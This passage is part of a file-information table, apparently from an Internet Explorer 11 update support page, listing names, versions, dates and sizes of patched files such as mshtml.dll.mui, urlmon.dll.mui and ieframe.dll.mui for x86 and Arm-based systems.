12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:30| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.20139| 13-Sep-2021| 22:44| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.20139| 13-Sep-2021| 22:45| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.20139| 13-Sep-2021| 20:27| 4,387,840 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20139| 13-Sep-2021| 22:46| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:34| 333,312 \ninstall.ins| Not versioned| 13-Sep-2021| 19:04| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.20139| 13-Sep-2021| 20:19| 710,656 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 22:45| 772,608 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.20045| 4-Jun-2021| 21:12| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:16| 2,308,608 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.20139| 13-Sep-2021| 22:45| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \ninetcomm.dll| 6.3.9600.20139| 13-Sep-2021| 20:44| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \n \n## \n\n__\n\nInternet Explorer 11 on all supported Arm-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 20:58| 1,064,960 \nhlink.dll| 6.3.9600.20120| 11-Sep-2021| 19:05| 70,144 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 47,616 \nurlmon.dll| 11.0.9600.20139| 13-Sep-2021| 20:07| 1,035,264 \niexplore.exe| 11.0.9600.19867| 12-Oct-2020| 22:01| 807,816 \nWininetPlugin.dll| 6.3.9600.16384| 21-Aug-2013| 19:52| 33,792 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 10:19| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:10| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.20139| 13-Sep-2021| 21:49| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nhtml.iec| 2019.0.0.20045| 4-Jun-2021| 21:28| 320,000 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:05| 2,007,040 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 307,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,888 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,304 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,008 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:16| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 283,648 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 291,840 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,520 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,376 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 258,048 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 256,512 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 288,256 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 285,184 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 297,472 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,816 \nmshtml.dll.mui| 11.0.9600.20139| 13-Sep-2021| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 281,600 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 286,720 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 292,352 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 242,176 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 68,608 \nF12Resources.dll.mui| 11.0.9600.20139| 13-Sep-2021| 21:49| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:26| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:03| 63,488 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:04| 215,552 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 10:09| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:54| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:53| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:02| 48,640 \nurlmon.dll.mui| 